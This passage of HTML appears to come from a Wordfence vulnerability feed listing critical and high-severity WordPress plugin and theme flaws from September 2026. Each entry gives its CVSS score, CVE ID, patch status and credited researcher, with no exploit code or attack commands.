<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/47337bc1-fa3d-470c-9524-859295261017" target="_blank" rel="noopener">Multi Uploader for Gravity Forms &lt;= 1.1.9 &#8211; Unauthenticated Arbitrary File Upload via Chunked File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87796" target="_blank" rel="noopener noreferrer">							CVE-2026-87796						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gf-multi-uploader" target="_blank" rel="noopener">Multi Uploader for Gravity Forms</a> <span class="wfvr-software-slug">[gf-multi-uploader]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/47337bc1-fa3d-470c-9524-859295261017" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0da53ab-c750-4ff4-b3d1-49b6603182ae" target="_blank" rel="noopener">Private Feed Key &lt;= 0.1 &#8211; Authentication Bypass</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86707" target="_blank" rel="noopener noreferrer">							CVE-2026-86707						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/private-feed-key" target="_blank" rel="noopener">Private Feed Key</a> <span class="wfvr-software-slug">[private-feed-key]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0da53ab-c750-4ff4-b3d1-49b6603182ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a6aeafd3-15be-49a3-be60-e33e909f32ca" target="_blank" rel="noopener">The Pressengine &lt;= 1.0 &#8211; Authentication Bypass</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86709" target="_blank" rel="noopener noreferrer">							CVE-2026-86709						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-pressengine" target="_blank" rel="noopener">The Pressengine</a> <span class="wfvr-software-slug">[the-pressengine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a6aeafd3-15be-49a3-be60-e33e909f32ca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a61ddbc-9118-4cad-a639-7822606a3181" target="_blank" rel="noopener">TrueBooker &lt;= 1.2.3 &#8211; Missing Authorization to Unauthenticated Arbitrary User Email Modification via &#8216;admin_addcustomer&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14349" target="_blank" rel="noopener noreferrer">							CVE-2026-14349						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/devlin-jenkins" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6ca918101b905ebc548314f9a30d65f1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6ca918101b905ebc548314f9a30d65f1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/devlin-jenkins" target="_blank" rel="noopener">Devlin Jenkins</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a61ddbc-9118-4cad-a639-7822606a3181" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77b19085-4a7f-4554-bbad-46aa9ab10fc5" target="_blank" rel="noopener">Ultimate Addons for Contact Form 7 3.2.4 &#8211; 3.5.50 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84750" target="_blank" rel="noopener noreferrer">							CVE-2026-84750						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-contact-form-7" target="_blank" rel="noopener">Ultra Addons for Contact Form 7</a> <span class="wfvr-software-slug">[ultimate-addons-for-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77b19085-4a7f-4554-bbad-46aa9ab10fc5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5016ecf2-6016-4a46-8e16-30e9f79344e4" target="_blank" rel="noopener">WooCommerce Online Product Designer &lt;= 2.14.0 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82187" target="_blank" rel="noopener noreferrer">							CVE-2026-82187						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/web-to-print-online-designer" target="_blank" rel="noopener">Web to Print Online Designer</a> <span class="wfvr-software-slug">[web-to-print-online-designer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-gozdiskowski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-gozdiskowski" target="_blank" rel="noopener">Mike Gozdiskowski</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5016ecf2-6016-4a46-8e16-30e9f79344e4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ea5e77-335a-4f40-9a04-9e1d4f3e1017" target="_blank" rel="noopener">WP images upload on piclect &lt;= 1.0 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84171" target="_blank" rel="noopener noreferrer">							CVE-2026-84171						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-images-upload-on-piclect" target="_blank" rel="noopener">WP images upload on piclect</a> <span class="wfvr-software-slug">[wp-images-upload-on-piclect]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ea5e77-335a-4f40-9a04-9e1d4f3e1017" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec1ce091-7aac-4ec6-8f6f-6d961e2073cb" target="_blank" rel="noopener">wpShopGermany IT-RECHT KANZLEI &lt;= 2.3 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88795" target="_blank" rel="noopener noreferrer">							CVE-2026-88795						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpshopgermany-it-recht-kanzlei" target="_blank" rel="noopener">wpShopGermany IT-RECHT KANZLEI</a> <span class="wfvr-software-slug">[wpshopgermany-it-recht-kanzlei]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec1ce091-7aac-4ec6-8f6f-6d961e2073cb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c28869c-c880-4322-9f17-09495a08576e" target="_blank" rel="noopener">Forminator Forms &lt;= 1.57.2 &#8211; Unauthenticated Arbitrary Shortcode Execution via &#8216;current_url&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92229" target="_blank" rel="noopener noreferrer">							CVE-2026-92229						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c28869c-c880-4322-9f17-09495a08576e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d6ad49ff-85eb-4d05-ba23-51d89695add3" target="_blank" rel="noopener">WP Recipe Maker &lt;= 10.8.1 &#8211; Unauthenticated Arbitrary Shortcode Execution via Recipe Comment Content</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89274" target="_blank" rel="noopener noreferrer">							CVE-2026-89274						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recipe-maker" target="_blank" rel="noopener">WP Recipe Maker</a> <span class="wfvr-software-slug">[wp-recipe-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d6ad49ff-85eb-4d05-ba23-51d89695add3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc8dffc2-ae5b-4482-9eba-adc439a52c26" target="_blank" rel="noopener">Consulting &#8211; Business, Finance WordPress Theme &lt;= 6.7.16 &#8211; Authenticated (Subscriber+) Privilege Escalation via AJAX</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14805" target="_blank" rel="noopener noreferrer">							CVE-2026-14805						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/consulting-business-finance-wordpress-theme" target="_blank" rel="noopener">Consulting &#8211; Business, Finance WordPress Theme</a> <span class="wfvr-software-slug">[consulting]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bc8dffc2-ae5b-4482-9eba-adc439a52c26" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af2115ba-5573-41ce-8d5a-58c57c65c75a" target="_blank" rel="noopener">Contest Gallery &lt;= 32.0.1 &#8211; Unauthenticated Arbitrary File Upload  via &#8216;baseUrlForFacebook&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78088" target="_blank" rel="noopener noreferrer">							CVE-2026-78088						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</a> <span class="wfvr-software-slug">[contest-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3a44d04cdd3490b305d8f18cf157f1fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3a44d04cdd3490b305d8f18cf157f1fd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener">mad4cyber</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af2115ba-5573-41ce-8d5a-58c57c65c75a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a70757f7-63a0-452a-a078-0fb7f82844b6" target="_blank" rel="noopener">Mapster WP Maps &lt;= 1.23.0 &#8211; Authenticated (Subscriber+) Arbitrary User Meta Write via &#8216;acf-photo-gallery-groups&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12954" target="_blank" rel="noopener noreferrer">							CVE-2026-12954						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapster-wp-maps" target="_blank" rel="noopener">Mapster WP Maps</a> <span class="wfvr-software-slug">[mapster-wp-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a70757f7-63a0-452a-a078-0fb7f82844b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc87f440-d26e-4535-afe4-c4a97b7c591a" target="_blank" rel="noopener">Save as PDF Plugin by PDFCrowd &lt;= 4.6.1 &#8211; Authenticated (Contributor+) Arbitrary Function Invocation / Code Injection via &#8216;pdf_created_callback&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92807" target="_blank" rel="noopener noreferrer">							CVE-2026-92807						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/save-as-pdf-by-pdfcrowd" target="_blank" rel="noopener">Save as PDF Plugin by PDFCrowd</a> <span class="wfvr-software-slug">[save-as-pdf-by-pdfcrowd]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
